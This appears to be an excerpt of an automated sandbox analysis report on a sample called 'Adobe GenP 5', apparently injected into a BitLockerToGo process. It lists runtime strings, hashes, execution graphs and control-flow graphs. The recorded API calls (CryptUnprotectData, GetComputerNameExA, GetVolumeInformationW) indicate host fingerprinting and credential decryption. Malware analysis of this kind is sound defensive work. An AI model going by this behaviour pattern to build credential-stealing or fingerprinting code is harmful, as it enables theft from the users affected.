                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A74000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c20000_Adobe GenP 5.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowthird_party/swagger-ui/swagger-ui.csst$%$)*.*/*=+++-+=, ---=->.(.\/*///=/i/v00010X0b0o0s0x1;254;535;7;809;: :=:]; <-<<<==#==> >=>>??A3A4CNCcCfCoCsLlLmLoLtLuMcMeMnMuNONdNlNoNuONOUOnPcPdPePfPiPoPsR8R9STScSkSmSoTeV1V2V3V5V6XiYiZlZpZs[]")":"\$\'\(\)\*\-\.\/\0\9\?\D\E\S\W\[\"\\\]\^\a\c\d\f\n\r\s\t\w\{\|$CreateWaitableTimerEx when creating timer failedbufio: writer returned negative count from Writecan't install method/function %q with %d resultscannot use FakeImportC and go115UsesCgo togethercould not find GetSystemTimeAsFileTime() syscallfail to read symbol $VirtualQuery for stack base failedadding nil Certificate to CertPool : invalid buffer overlapcrypto/rsa: missing public modulusdoaddtimer: P already set in timerforEachP: sched.safePointWait != 0frame_settings_window_size_too_bigframe_windowupdate_zer$bad g0 stackbad recoveryblock clausecaller errorcan't happencas64 failedcgo functionchan receiveclose notifycontent-typecontext.TODOdarwin/amd64darwin/arm64dumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddeco$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=sink factory already registered for scheme %qthird_party/swagger-ui/swagger-initializer.jstransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtemplate: %s:%d: %stoo many open filesunclosed left parenunexpected %s in %sunexpected InstFailunexpected g statusunknown Go ty
                                                                                    • API String ID: 0-971395273
                                                                                    • Opcode ID: 2b341477204dbdf11ba9091713056b3e2748f9b93d3a7a38fd21549b1787ef53
                                                                                    • Instruction ID: 60b894b5ca1e77409af5ce25c3bbb6bd95200e8145fffb8444eaf0d1a1e26e92
                                                                                    • Opcode Fuzzy Hash: 2b341477204dbdf11ba9091713056b3e2748f9b93d3a7a38fd21549b1787ef53
                                                                                    • Instruction Fuzzy Hash: A681F5B85097458FD300EF64D18571ABBE0BF88749F40892CF89897392DB74D988EF5A
                                                                                    Strings
                                                                                    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablesymbol does not existtimer da, xrefs: 00C63AE1
                                                                                    • m->p= max= min= next= null p->m= prev= span=% util%%%02x%s.v%d%s: %s' for '"&<>, xrefs: 00C63A4B
                                                                                    • releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterssyntax errortraceStringstransmitfileunexpected )unknown portuntyped booluntyped runewintrust.dllwirep: p->m=worker mode wtsapi32.dll{{continue}} != sweepgen (defau, xrefs: 00C63A29
                                                                                    • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportCGO_ENA, xrefs: 00C63A97
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2307376286.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2307360248.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000EC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307597389.0000000000FBF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307973819.000000000117F000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2307995567.0000000001180000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308016419.000000000118A000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308681416.00000000019DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308698146.00000000019DB000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308711580.00000000019DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308724757.00000000019DE000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E0000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019E9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.00000000019ED000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308737772.0000000001A09000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308795286.0000000001A10000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A11000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A34000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2308808745.0000000001A74000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c20000_Adobe GenP 5.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: m->p= max= min= next= null p->m= prev= span=% util%%%02x%s.v%d%s: %s' for '"&<>$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html0123456789_30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportCGO_ENA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablesymbol does not existtimer da$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterssyntax errortraceStringstransmitfileunexpected )unknown portuntyped booluntyped runewintrust.dllwirep: p->m=worker mode wtsapi32.dll{{continue}} != sweepgen (defau
                                                                                    • API String ID: 0-3735137587
                                                                                    • Opcode ID: aa551de960785934747052479f69e278c01850fc5aee374284261b704e339752
                                                                                    • Instruction ID: 2d21afbc85155b9b969dcf00d79bcacef6657d3b7c08de407033cd94c5c9682c
                                                                                    • Opcode Fuzzy Hash: aa551de960785934747052479f69e278c01850fc5aee374284261b704e339752
                                                                                    • Instruction Fuzzy Hash: 813106B85097458FD300EF64C18571ABBE1FF88305F41892DE8989B352DB74D988EF66

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:59.4%
                                                                                    Total number of Nodes:155
                                                                                    Total number of Limit Nodes:7
                                                                                    execution_graph 13044 420000 13045 420014 13044->13045 13049 420121 13044->13049 13050 420140 13045->13050 13047 4200fc 13048 41e7f0 LdrInitializeThunk 13047->13048 13047->13049 13048->13049 13052 420150 13050->13052 13051 43be10 LdrInitializeThunk 13053 42025f 13051->13053 13052->13051 13052->13052 12969 42a749 12970 42a753 12969->12970 12971 42ba38 GetPhysicallyInstalledSystemMemory 12970->12971 12972 42ba60 12971->12972 13059 408690 13062 40869f 13059->13062 13060 40897b ExitProcess 13061 40895f 13061->13060 13062->13060 13062->13061 13064 40c7c0 CoInitializeEx 13062->13064 13065 416d93 13067 416da0 13065->13067 13066 416f27 CryptUnprotectData 13067->13066 12973 43c050 12974 43c070 12973->12974 12977 43c0c8 12974->12977 12979 439af0 LdrInitializeThunk 12974->12979 12975 43c16e 12977->12975 12980 439af0 LdrInitializeThunk 12977->12980 12979->12977 12980->12975 13068 43c410 13069 43c430 13068->13069 13071 43c47e 13069->13071 13074 439af0 LdrInitializeThunk 13069->13074 13071->13071 13073 43c54f 13071->13073 13075 439af0 LdrInitializeThunk 13071->13075 13074->13071 13075->13073 12989 40e2d5 12990 40e2e1 12989->12990 12991 40e713 CoUninitialize 12990->12991 12992 40e730 12991->12992 13076 433f96 13080 43b5e0 13076->13080 13078 433fae GetUserDefaultUILanguage 13079 433fe0 13078->13079 13081 43b610 13080->13081 13081->13081 12993 43a55a 12994 43a564 12993->12994 12995 43a63e 12994->12995 12999 439af0 LdrInitializeThunk 12994->12999 12998 439af0 LdrInitializeThunk 12995->12998 12998->12995 12999->12995 13000 42b2db 13001 42b2e4 13000->13001 13004 435090 13001->13004 13007 43509e 13004->13007 13005 42b3f7 13008 43514b 13007->13008 13013 439af0 LdrInitializeThunk 13007->13013 13008->13005 13010 435234 13008->13010 13012 439af0 LdrInitializeThunk 13008->13012 13010->13005 13014 439af0 LdrInitializeThunk 13010->13014 13012->13008 13013->13007 13014->13010 13082 40d49a 13083 40d4b0 
13082->13083 13085 40d52e 13083->13085 13098 439af0 LdrInitializeThunk 13083->13098 13087 40d5de 13085->13087 13099 439af0 LdrInitializeThunk 13085->13099 13094 423040 13087->13094 13089 40d65a 13090 4253a0 LdrInitializeThunk 13089->13090 13091 40d683 13090->13091 13092 4256a0 LdrInitializeThunk 13091->13092 13093 40d68c 13092->13093 13095 42304e 13094->13095 13100 43c310 13095->13100 13098->13085 13099->13087 13102 43c330 13100->13102 13101 423122 13102->13101 13104 439af0 LdrInitializeThunk 13102->13104 13104->13101 13105 43a01c 13107 43a01e 13105->13107 13106 43a082 13107->13106 13110 439af0 LdrInitializeThunk 13107->13110 13109 43a154 13110->13109 13015 4228e2 13016 4228f1 13015->13016 13019 43be10 13016->13019 13018 4229e1 13020 43be30 13019->13020 13021 43bf3e 13020->13021 13023 439af0 LdrInitializeThunk 13020->13023 13021->13018 13023->13021 13111 40dca0 13112 40dcc0 13111->13112 13117 4353a0 13112->13117 13114 40ddce 13115 4353a0 3 API calls 13114->13115 13116 40dfc5 13115->13116 13116->13116 13118 4353d0 13117->13118 13118->13118 13119 4356c5 SysAllocString 13118->13119 13123 435718 13118->13123 13121 4356ed 13119->13121 13120 435a87 GetVolumeInformationW 13124 435aa2 13120->13124 13122 4356f8 CoSetProxyBlanket 13121->13122 13121->13123 13122->13123 13123->13120 13124->13114 13125 420720 13134 43bc90 13125->13134 13128 420760 13129 420eb0 13128->13129 13133 420810 13128->13133 13138 439af0 LdrInitializeThunk 13128->13138 13131 420e32 13131->13129 13140 439af0 LdrInitializeThunk 13131->13140 13133->13131 13139 439af0 LdrInitializeThunk 13133->13139 13136 43bcb0 13134->13136 13135 43bdbe 13135->13128 13136->13135 13141 439af0 LdrInitializeThunk 13136->13141 13138->13128 13139->13133 13140->13131 13141->13135 13142 40d3a4 13143 40d3c0 13142->13143 13144 40d43c 13143->13144 13146 439af0 LdrInitializeThunk 13143->13146 13146->13144 13024 439be8 13025 439c00 13024->13025 13028 439cde 13025->13028 13031 439af0 LdrInitializeThunk 13025->13031 13027 43a082 
13028->13027 13032 439af0 LdrInitializeThunk 13028->13032 13030 43a154 13031->13028 13032->13030 13147 40cf2b 13148 40cfb0 13147->13148 13148->13148 13149 40d02e 13148->13149 13153 439af0 LdrInitializeThunk 13148->13153 13152 439af0 LdrInitializeThunk 13149->13152 13152->13149 13153->13149 13033 4380f3 13036 43b250 13033->13036 13035 4380f8 RtlFreeHeap 13037 43b270 13036->13037 13037->13035 13037->13037 13038 40c7f3 CoInitializeSecurity 13159 4380b0 13160 4380b6 RtlAllocateHeap 13159->13160 13161 439ab6 13162 43b250 13161->13162 13163 439abb RtlReAllocateHeap 13162->13163 13164 439ae0 13163->13164 13165 42dbbf 13168 4145b0 13165->13168 13167 42dbc4 CoSetProxyBlanket 13168->13167 13039 439e7d 13041 439e90 13039->13041 13040 439ede 13041->13040 13043 439af0 LdrInitializeThunk 13041->13043 13043->13040 13169 42a03c 13170 43b5e0 13169->13170 13171 42a04c GetComputerNameExA 13170->13171 13173 42a0a0 13171->13173 13172 42a11b GetComputerNameExA 13174 42a180 13172->13174 13173->13172 13173->13173 13175 41733e 13176 417345 13175->13176 13176->13176 13177 43be10 LdrInitializeThunk 13176->13177 13178 41747d 13177->13178

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
control_flow_graph 13 420720-420765 call 43bc90 16 42076b-4207c8 call 414590 call 438090 13->16 17 420f0f-420f1f 13->17 22 4207ca-4207cd 16->22 23 4207cf-4207fb 22->23 24 4207fd-420801 22->24 23->22 25 420803-42080e 24->25 26 420810 25->26 27 420815-42082e 25->27 28 4208cd-4208d0 26->28 29 420830 27->29 30 420835-420840 27->30 33 4208d2 28->33 34 4208d4-4208df 28->34 31 4208bc-4208c1 29->31 30->31 32 420842-4208b2 call 439af0 30->32 36 4208c3 31->36 37 4208c5-4208c8 31->37 42 4208b7 32->42 33->34 38 420e36-420e68 call 4380e0 34->38 39 4208e5-4208f5 34->39 36->28 37->25 47 420e6a-420e6d 38->47 40 4208f7-420917 39->40 43 420b3a-420b3d 40->43 44 42091d-42093e 40->44 42->31 48 420b43-420b59 call 438090 43->48 49 420b3f-420b41 43->49 46 420945-420948 44->46 50 42094a-42099a 46->50 51 42099c-4209ba call 420f20 46->51 52 420e6f-420e9b 47->52 53 420e9d-420ea1 47->53 61 420b5b-420b6f 48->61 62 420b5d-420b68 48->62 54 420b71-420b73 49->54 50->46 51->43 73 4209c0-4209e9 51->73 52->47 59 420ea3-420eae 53->59 56 420b79-420b9a 54->56 57 420e0d-420e18 54->57 63 420b9e-420ba1 56->63 67 420e1a-420e24 57->67 68 420e1c-420e20 57->68 65 420eb2-420ec7 59->65 66 420eb0 59->66 61->54 70 420e28-420e2c 62->70 71 420c13-420c48 63->71 72 420ba3-420c11 63->72 75 420ecb-420ed6 65->75 76 420ec9 65->76 74 420f06-420f0b 66->74 78 420e26 67->78 68->78 70->40 79 420e32-420e34 70->79 81 420c4a-420c4d 71->81 72->63 82 4209eb-4209ee 73->82 74->17 83 420efa-420efd 75->83 84 420ed8-420ef5 call 439af0 75->84 76->83 78->70 79->38 88 420c4f-420c7b 81->88 89 420c7d-420c81 81->89 90 4209f0-420a57 82->90 91 420a59-420a7c call 420f20 82->91 86 420f01-420f04 83->86 87 420eff 83->87 84->83 86->59 87->74 88->81 93 420c83-420c8e 89->93 90->82 100 420a83-420a9a 91->100 101 420a7e 91->101 96 420c90 93->96 97 420c95-420caa 93->97 99 420d51-420d54 96->99 102 420cb1-420cbc 97->102 103 420cac 97->103 106 420d56 99->106 107 420d58-420d77 99->107 108 420a9e-420b38 call 407fd0 call 414210 call 407fe0 100->108 109 420a9c 100->109 101->43 104 420d42-420d45 102->104 105 420cc2-420d38 call 439af0 102->105 103->104 112 420d47 104->112 113 420d49-420d4c 104->113 115 420d3d 105->115 106->107 114 420d79-420d7c 107->114 108->43 109->108 112->99 113->93 117 420da3-420da9 114->117 118 420d7e-420da1 114->118 115->104 120 420dd7-420de3 117->120 121 420dab-420daf 117->121 118->114 122 420df6-420df8 120->122 123 420de5-420df4 call 4380e0 120->123 125 420db1-420db8 121->125 127 420dfa-420e03 122->127 123->127 128 420dba-420dc6 125->128 129 420dc8-420dcb 125->129 127->57 134 420e05-420e0b 127->134 128->125 130 420dd3-420dd5 129->130 131 420dcd 129->131 130->120 131->130 134->70
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: !@$,$A$A$B$B$C$C$D$D$DABCD$a$v
• API String ID: 0-4069001718
• Opcode ID: d24c0bf20b5cfa0d2cb17c6ee7a9234297006efc58071f83e46e167ed2a4bede
• Instruction ID: 6c52679abcfbc30870106b065bba07298c4f65f03cefc9d75d065d86b06c63aa
• Opcode Fuzzy Hash: d24c0bf20b5cfa0d2cb17c6ee7a9234297006efc58071f83e46e167ed2a4bede
• Instruction Fuzzy Hash: 3622027160C3A08FD3248B68D49136FBBE1ABC5314F598A2EE5D687383D6BD8845C74B

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 144 42a03c-42a098 call 43b5e0 GetComputerNameExA 147 42a0a0-42a0c5 144->147 147->147 148 42a0c7-42a0d1 147->148 149 42a0d3-42a0da 148->149 150 42a0eb-42a0f8 148->150 151 42a0e0-42a0e9 149->151 152 42a0fa-42a101 150->152 153 42a11b-42a173 GetComputerNameExA 150->153 151->150 151->151 155 42a110-42a119 152->155 154 42a180-42a1d7 153->154 154->154 156 42a1d9-42a1e3 154->156 155->153 155->155 157 42a1e5-42a1ef 156->157 158 42a1fb-42a20b 156->158 159 42a1f0-42a1f9 157->159 160 42a22b-42a282 158->160 161 42a20d-42a214 158->161 159->158 159->159 164 42a290-42a2dc 160->164 162 42a220-42a229 161->162 162->160 162->162 164->164 165 42a2de-42a2e8 164->165 166 42a2ea-42a2f1 165->166 167 42a30b-42a318 165->167 168 42a300-42a309 166->168 169 42a31a-42a321 167->169 170 42a33b-42a397 call 43b5e0 167->170 168->167 168->168 171 42a330-42a339 169->171 175 42a3a0-42a3de 170->175 171->170 171->171 175->175 176 42a3e0-42a3ea 175->176 177 42a40b-42a452 call 408e00 176->177 178 42a3ec-42a3f3 176->178 182 42a460-42a48c 177->182 179 42a400-42a409 178->179 179->177 179->179 182->182 183 42a48e-42a49a 182->183 184 42a4bb-42a4be call 42e710 183->184 185 42a49c-42a4a3 183->185 188 42a4c3-42a4e2 184->188 186 42a4b0-42a4b9 185->186 186->184 186->186
APIs
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042A070
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042A141
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: ComputerName
• String ID: 5+$)'->$Yysw$p.
• API String ID: 3545744682-3271381888
• Opcode ID: 7bc9d37edc3057e610e15797e311d901a77cf4983808ab4ed45449bae220d780
• Instruction ID: a0bfec2fd4801fa297db708dd0ce194928d6281eb9dfd43985bf1e531d4ceda7
• Opcode Fuzzy Hash: 7bc9d37edc3057e610e15797e311d901a77cf4983808ab4ed45449bae220d780
• Instruction Fuzzy Hash: 63B1013050C3D18BD7358F3998A17ABBBD19F97314F5888AED5C98B382D779400A8B67

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 189 40e2d5-40e2ff call 409630 193 40e300-40e314 189->193 193->193 194 40e316-40e329 193->194 195 40e330-40e355 194->195 195->195 196 40e357-40e3b4 195->196 197 40e3c0-40e400 196->197 197->197 198 40e402-40e413 197->198 199 40e415-40e41f 198->199 200 40e42b-40e433 198->200 201 40e420-40e429 199->201 202 40e435-40e436 200->202 203 40e44b-40e455 200->203 201->200 201->201 204 40e440-40e449 202->204 205 40e457-40e45b 203->205 206 40e46b-40e473 203->206 204->203 204->204 207 40e460-40e469 205->207 208 40e475-40e476 206->208 209 40e48b-40e495 206->209 207->206 207->207 210 40e480-40e489 208->210 211 40e497-40e49b 209->211 212 40e4ab-40e4b7 209->212 210->209 210->210 213 40e4a0-40e4a9 211->213 214 40e4d1-40e60f 212->214 215 40e4b9-40e4bb 212->215 213->212 213->213 217 40e610-40e651 214->217 216 40e4c0-40e4cd 215->216 216->216 218 40e4cf 216->218 217->217 219 40e653-40e68f 217->219 218->214 220 40e690-40e6c0 219->220 220->220 221 40e6c2-40e72f call 40b610 call 409630 CoUninitialize 220->221 226 40e730-40e744 221->226 226->226 227 40e746-40e759 226->227 228 40e760-40e785 227->228 228->228 229 40e787-40e7e4 228->229 230 40e7f0-40e82f 229->230 230->230 231 40e831-40e842 230->231 232 40e844-40e84b 231->232 233 40e85b-40e863 231->233 234 40e850-40e859 232->234 235 40e865-40e866 233->235 236 40e87b-40e885 233->236 234->233 234->234 237 40e870-40e879 235->237 238 40e887-40e88b 236->238 239 40e89b-40e8a3 236->239 237->236 237->237 240 40e890-40e899 238->240 241 40e8a5-40e8a6 239->241 242 40e8bb-40e8c5 239->242 240->239 240->240 245 40e8b0-40e8b9 241->245 243 40e8c7-40e8cb 242->243 244 40e8db-40e8e7 242->244 246 40e8d0-40e8d9 243->246 247 40e901-40ea1b 244->247 248 40e8e9-40e8eb 244->248 245->242 245->245 246->244 246->246 250 40ea20-40ea61 247->250 249 40e8f0-40e8fd 248->249 249->249 251 40e8ff 249->251 250->250 252 40ea63-40ea84 250->252 251->247 253 40ea90-40eac0 252->253 253->253 254 40eac2-40eb0b call 40b610 253->254
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: Uninitialize
• String ID: ";G$d<$l$nv$tr
• API String ID: 3861434553-995644117
• Opcode ID: 8677d267741a8d6fd2b04c2b67c7019589f9450b38e70caaeb5818bcc74a52c9
• Instruction ID: df48264671a07a49878f384e58ab6bb208ea46f082ef2c8c8ba53de654e0de4f
• Opcode Fuzzy Hash: 8677d267741a8d6fd2b04c2b67c7019589f9450b38e70caaeb5818bcc74a52c9
• Instruction Fuzzy Hash: 1612AE7550D3D08BD3328F2688906EBBFE1ABD7304F184A6DD4C95B392C73A5909CB96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 257 4353a0-4353c2 258 4353d0-43542b 257->258 258->258 259 43542d-43543a 258->259 260 435440-43546c 259->260 260->260 261 43546e-4354af 260->261 262 4354b0-4354d5 261->262 262->262 263 4354d7-4354f3 262->263 265 4355ab-4355b6 263->265 266 4354f9-435504 263->266 267 4355c0-4355f7 265->267 268 435510-435549 266->268 267->267 269 4355f9-435650 267->269 268->268 270 43554b-43555f 268->270 274 435a77-435aa0 call 43b5e0 GetVolumeInformationW 269->274 275 435656-43568f 269->275 271 435560-43559c 270->271 271->271 273 43559e-4355a8 271->273 273->265 280 435aa2-435aa6 274->280 281 435aaa-435aac 274->281 276 435690-4356c3 275->276 276->276 278 4356c5-4356f2 SysAllocString 276->278 286 435a67-435a73 278->286 287 4356f8-435712 CoSetProxyBlanket 278->287 280->281 282 435abd-435ac8 281->282 284 435ad4-435aef 282->284 285 435aca-435ad1 282->285 288 435af0-435b25 284->288 285->284 286->274 289 435718-435736 287->289 290 435a5d-435a63 287->290 288->288 291 435b27-435b45 288->291 293 435740-43576f 289->293 290->286 294 435b50-435b77 291->294 293->293 295 435771-4357e7 293->295 294->294 296 435b79-435ba1 call 41d4b0 294->296 299 4357f0-435830 295->299 302 435bb0-435bb8 296->302 299->299 301 435832-435866 299->301 311 435a47-435a59 301->311 312 43586c-43588e 301->312 302->302 303 435bba-435bc8 302->303 305 435ab0-435ab7 303->305 306 435bce-435bde call 408060 303->306 305->282 307 435be3-435bea 305->307 306->305 311->290 315 435894-435897 312->315 316 435a3d-435a43 312->316 315->316 318 43589d-4358a2 315->318 316->311 318->316 319 4358a8-4358f3 318->319 321 435900-435930 319->321 321->321 322 435932-435944 321->322 323 435948-43594a 322->323 324 435950-435956 323->324 325 435a28-435a39 323->325 324->325 326 43595c-43596a 324->326 325->316 327 4359b7 326->327 328 43596c-435971 326->328 331 4359b9-4359eb call 407fd0 call 408e00 327->331 330 435996-43599a 328->330 332 435980-435988 330->332 333 43599c-4359a5 330->333 343 4359f2-4359fe 331->343 344 4359ed 331->344 336 43598b-435994 332->336 337 4359a7-4359aa 333->337 338 4359ac-4359b0 333->338 336->330 336->331 337->336 338->336 341 4359b2-4359b5 338->341 341->336 345 435a00 343->345 346 435a05-435a25 call 408000 call 407fe0 343->346 344->343 345->346 346->325
APIs
• SysAllocString.OLEAUT32(845C8253), ref: 004356CA
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043570A
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00435A9C
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: AllocBlanketInformationProxyStringVolume
• String ID: 4=>?$Ri
• API String ID: 2230333033-1281010762
• Opcode ID: b20d8bb7b98530e4b535255ff4ea33fe897a94bcb5ba4787325f79f25bd3d770
• Instruction ID: 7fd69b617c57492c6cc3a4850a10533796f215261fd1a1bde8e14e6a6fa4f0a4
• Opcode Fuzzy Hash: b20d8bb7b98530e4b535255ff4ea33fe897a94bcb5ba4787325f79f25bd3d770
• Instruction Fuzzy Hash: 64220D72A083109BD310DF68CC81B9BBBE1EFC9314F19892DE985DB391D679D805CB96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 351 435090-4350c4 call 4145b0 354 4350c6-4350c9 351->354 355 4350cb-4350ea 354->355 356 4350ec-435107 354->356 355->354 357 435109-43510c 356->357 358 435139-43513c 357->358 359 43510e-435137 357->359 360 43513e-435149 358->360 359->357 361 43514b 360->361 362 43514d-435162 360->362 363 4351ba-4351bd 361->363 364 435166-435171 362->364 365 435164 362->365 368 4351c1-4351cb 363->368 369 4351bf 363->369 366 4351ae-4351b1 364->366 367 435173-4351a9 call 439af0 364->367 365->366 373 4351b3 366->373 374 4351b5-4351b8 366->374 367->366 370 4351d2-4351f0 368->370 371 4351cd 368->371 369->368 376 4351f2-4351f5 370->376 375 43538d-43539a 371->375 373->363 374->360 378 435222-435225 376->378 379 4351f7-435220 376->379 380 435227-435232 378->380 379->376 381 435234 380->381 382 435239-435251 380->382 383 4352bb-4352be 381->383 384 435253 382->384 385 435255-435260 382->385 386 4352c2-4352c7 383->386 387 4352c0 383->387 388 4352ab-4352af 384->388 385->388 389 435262-43529e call 439af0 385->389 390 4352d5-4352f3 386->390 391 4352c9-4352d2 386->391 387->386 393 4352b3-4352b6 388->393 394 4352b1 388->394 396 4352a3-4352a6 389->396 395 4352f5-4352f8 390->395 391->390 393->380 394->383 397 435325-435328 395->397 398 4352fa-435323 395->398 396->388 399 43532a-435330 397->399 398->395 400 435332 399->400 401 435334-435346 399->401 402 43538b 400->402 403 43534a-435350 401->403 404 435348 401->404 402->375 405 43537f-435382 403->405 406 435352-43537c call 439af0 403->406 404->405 407 435386-435389 405->407 408 435384 405->408 406->405 407->399 408->402
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID: A$B$C$D$DCBADCBA
• API String ID: 0-3740881347
• Opcode ID: adecac1cb3f50ce779c15c6944098ec97546d2522254e89f39d4e12291314d8a
• Instruction ID: 63b755127d4de6a4aad4bad12af58016d43057d5d69cefd924e5173af3b20b52
• Opcode Fuzzy Hash: adecac1cb3f50ce779c15c6944098ec97546d2522254e89f39d4e12291314d8a
• Instruction Fuzzy Hash: 2AA16A31E08654CFDB04CBBCC4513AE7BF1AB4A310F1851AED886A73D2C27D8941CB9A

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 440 40dca0-40dcb7 441 40dcc0-40dce5 440->441 441->441 442 40dce7-40dd17 call 401b70 441->442 445 40dd20-40dd6c 442->445 445->445 446 40dd6e-40dd88 call 401b70 445->446 449 40dd90-40ddb5 446->449 449->449 450 40ddb7-40de2f call 401b70 call 4353a0 call 40ed40 449->450 457 40de30-40de53 450->457 457->457 458 40de55-40de67 457->458 459 40de91-40deaf 458->459 460 40de69-40de77 458->460 462 40deb0-40ded5 459->462 461 40de80-40de8f 460->461 461->459 461->461 462->462 463 40ded7-40df07 call 401b70 462->463 466 40df10-40df5c 463->466 466->466 467 40df5e-40df7f call 401b70 466->467 470 40df80-40dfa5 467->470 470->470 471 40dfa7-40dfc0 call 401b70 call 4353a0 470->471 475 40dfc5-40e01f call 40ed40 471->475 478 40e020-40e043 475->478 478->478 479 40e045-40e057 478->479 480 40e081-40e0a0 479->480 481 40e059-40e067 479->481 482 40e070-40e07f 481->482 482->480 482->482
Strings
Memory Dump Source
• Source File: 00000003.00000002.2609837960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
